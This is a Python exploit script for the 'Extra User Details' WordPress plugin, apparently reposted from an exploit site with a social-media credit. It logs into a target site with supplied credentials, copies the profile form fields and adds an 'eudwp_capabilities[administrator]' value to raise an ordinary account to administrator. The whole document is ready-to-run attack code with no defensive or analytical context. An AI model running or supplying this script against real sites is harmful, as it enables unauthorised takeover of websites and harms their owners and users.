(EXPLOIT)Extra User Details PLUGINS WORDPRESS

1. # !/usr/bin/python3
2. ################################################################################
3. # Extra User Details Privilege Escalation Exploit
4. #
5. # Re Coded = http://facebook.com/stevanus.evo
6. #
7. # Dependencies: BeautifulSoup
8. ################################################################################
9.  
10. import requests
11. from bs4 import BeautifulSoup
12. import sys
13. target = sys.argv[1]
14.  
15. if not target.startswith("http"):
16.     target = "http://" + target
17.  
18. if target.endswith("/"):
19.     target = target[:-1]
20. loginUrl = target + '/wp-login.php'
21. profileUrl = target + '/wp-admin/profile.php'
22.  
23. loginPostData = {
24.     'log': 'username',
25.     'pwd': 'password',
26.     'rememberme': 'forever',
27.     'wp-submit': 'Log+In'
28. }
29.  
30. s = requests.Session()
31.  
32. r = s.post(loginUrl, loginPostData)
33.  
34. if r.status_code != 200:
35.     print('Login error')
36.     exit(1)
37.  
38. r = s.get(profileUrl)
39. soup = BeautifulSoup(r.text, 'html.parser')
40.  
41. f = soup.find('form', {'id': 'your-profile'})
42. if not f:
43.     print('Error')
44.     exit(1)
45.  
46. data = {
47.     'eudwp_capabilities[administrator]': 1,
48. }
49.  
50. for i in f.find_all('input'):
51.     if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
52.         data[i.attrs['name']] = i.attrs['value']
53.  
54. r = s.post(profileUrl, data)
55.  
56. if r.status_code == 200:
57.     print('Success')
58.  
59. exit(0)